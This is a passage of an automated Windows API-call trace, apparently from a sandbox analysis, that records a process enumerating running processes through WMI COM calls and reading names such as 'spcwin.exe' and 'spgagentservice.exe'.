[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.728] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.728] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.728] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.737] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ed1ab8) returned 0x0 [0225.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1ab8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.737] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ed1ab8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ed0e68) returned 0x0 [0225.737] WbemDefPath:IUnknown:Release (This=0x5ed1ab8) returned 0x0 [0225.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0e68, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ed0e68) returned 0x0 [0225.738] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0e68, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.738] WbemDefPath:IUnknown:AddRef (This=0x5ed0e68) returned 0x3 [0225.738] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0e68, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.738] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0e68, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.738] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0e68, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ed1ac8) returned 0x0 [0225.738] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ed1ac8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.738] WbemDefPath:IUnknown:Release (This=0x5ed1ac8) returned 0x3 [0225.738] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.738] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.738] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0e68, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.738] WbemDefPath:IUnknown:Release (This=0x5ed0e68) returned 0x2 [0225.738] WbemDefPath:IUnknown:Release (This=0x5ed0e68) returned 0x1 [0225.738] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.738] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.738] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0e68, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ed0e68) returned 0x0 [0225.739] WbemDefPath:IUnknown:AddRef (This=0x5ed0e68) returned 0x3 [0225.739] WbemDefPath:IUnknown:Release (This=0x5ed0e68) returned 0x2 [0225.739] WbemDefPath:IWbemPath:SetText (This=0x5ed0e68, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2844\"") returned 0x0 [0225.739] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.739] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.739] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.739] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.739] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.739] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.739] IWbemClassObject:Get (in: This=0x5ece290, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2573c58*=0, plFlavor=0x2573c5c*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spcwin.exe", varVal2=0x0), pType=0x2573c58*=8, plFlavor=0x2573c5c*=0) returned 0x0 [0225.739] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0225.739] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0225.739] IWbemClassObject:Get (in: This=0x5ece290, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2573c58*=8, plFlavor=0x2573c5c*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spcwin.exe", varVal2=0x0), pType=0x2573c58*=8, plFlavor=0x2573c5c*=0) returned 0x0 [0225.739] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0225.739] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0225.740] CoTaskMemAlloc (cb=0x4) returned 0x5ed1af8 [0225.740] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ed1af8, puReturned=0x2569c44 | out: apObjects=0x5ed1af8*=0x7423d8, puReturned=0x2569c44*=0x1) returned 0x0 [0225.804] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x7423d8) returned 0x0 [0225.804] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.804] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.805] IUnknown:AddRef (This=0x7423d8) returned 0x3 [0225.805] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.805] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.805] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x7423dc) returned 0x0 [0225.805] IMarshal:GetUnmarshalClass (in: This=0x7423dc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.805] IUnknown:Release (This=0x7423dc) returned 0x3 [0225.805] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.805] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.805] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.805] IUnknown:Release (This=0x7423d8) returned 0x2 [0225.805] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.805] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.805] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x7423d8) returned 0x0 [0225.805] IUnknown:AddRef (This=0x7423d8) returned 0x4 [0225.805] IUnknown:Release (This=0x7423d8) returned 0x3 [0225.805] IUnknown:Release (This=0x7423d8) returned 0x2 [0225.805] CoTaskMemFree (pv=0x5ed1af8) [0225.805] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.805] IUnknown:AddRef (This=0x7423d8) returned 0x3 [0225.805] IWbemClassObject:Get (in: This=0x7423d8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.806] IWbemClassObject:Get (in: This=0x7423d8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2852\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.806] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2852\"") returned 0x66 [0225.806] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2852\"") returned 0x66 [0225.806] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.806] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.806] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.806] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.807] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ed1af8) returned 0x0 [0225.807] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1af8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.807] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ed1af8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ed0f48) returned 0x0 [0225.807] WbemDefPath:IUnknown:Release (This=0x5ed1af8) returned 0x0 [0225.807] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0f48, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ed0f48) returned 0x0 [0225.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0f48, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.808] WbemDefPath:IUnknown:AddRef (This=0x5ed0f48) returned 0x3 [0225.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0f48, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0f48, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0f48, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ed1b08) returned 0x0 [0225.808] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ed1b08, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.808] WbemDefPath:IUnknown:Release (This=0x5ed1b08) returned 0x3 [0225.808] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.808] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0f48, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.808] WbemDefPath:IUnknown:Release (This=0x5ed0f48) returned 0x2 [0225.808] WbemDefPath:IUnknown:Release (This=0x5ed0f48) returned 0x1 [0225.808] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.808] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0f48, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ed0f48) returned 0x0 [0225.808] WbemDefPath:IUnknown:AddRef (This=0x5ed0f48) returned 0x3 [0225.809] WbemDefPath:IUnknown:Release (This=0x5ed0f48) returned 0x2 [0225.809] WbemDefPath:IWbemPath:SetText (This=0x5ed0f48, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2852\"") returned 0x0 [0225.809] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.809] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.809] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.809] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.809] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.809] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.809] IWbemClassObject:Get (in: This=0x7423d8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25744c4*=0, plFlavor=0x25744c8*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spgagentservice.exe", varVal2=0x0), pType=0x25744c4*=8, plFlavor=0x25744c8*=0) returned 0x0 [0225.809] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0225.809] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0225.809] IWbemClassObject:Get (in: This=0x7423d8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25744c4*=8, plFlavor=0x25744c8*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spgagentservice.exe", varVal2=0x0), pType=0x25744c4*=8, plFlavor=0x25744c8*=0) returned 0x0 [0225.809] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0225.809] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0225.809] CoTaskMemAlloc (cb=0x4) returned 0x5ed1b38 [0225.809] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ed1b38, puReturned=0x2569c44 | out: apObjects=0x5ed1b38*=0x742570, puReturned=0x2569c44*=0x1) returned 0x0 [0225.810] IUnknown:QueryInterface (in: This=0x742570, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x742570) returned 0x0 [0225.810] IUnknown:QueryInterface (in: This=0x742570, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.810] IUnknown:QueryInterface (in: This=0x742570, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.811] IUnknown:AddRef (This=0x742570) returned 0x3 [0225.811] IUnknown:QueryInterface (in: This=0x742570, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.811] IUnknown:QueryInterface (in: This=0x742570, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.811] IUnknown:QueryInterface (in: This=0x742570, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x742574) returned 0x0 [0225.811] IMarshal:GetUnmarshalClass (in: This=0x742574, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.811] IUnknown:Release (This=0x742574) returned 0x3 [0225.811] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.811] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.811] IUnknown:QueryInterface (in: This=0x742570, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.811] IUnknown:Release (This=0x742570) returned 0x2 [0225.811] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.811] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.811] IUnknown:QueryInterface (in: This=0x742570, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x742570) returned 0x0 [0225.811] IUnknown:AddRef (This=0x742570) returned 0x4 [0225.811] IUnknown:Release (This=0x742570) returned 0x3 [0225.811] IUnknown:Release (This=0x742570) returned 0x2 [0225.811] CoTaskMemFree (pv=0x5ed1b38) [0225.812] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.812] IUnknown:AddRef (This=0x742570) returned 0x3 [0225.812] IWbemClassObject:Get (in: This=0x742570, wszName="__GENUS", lFlags=0, 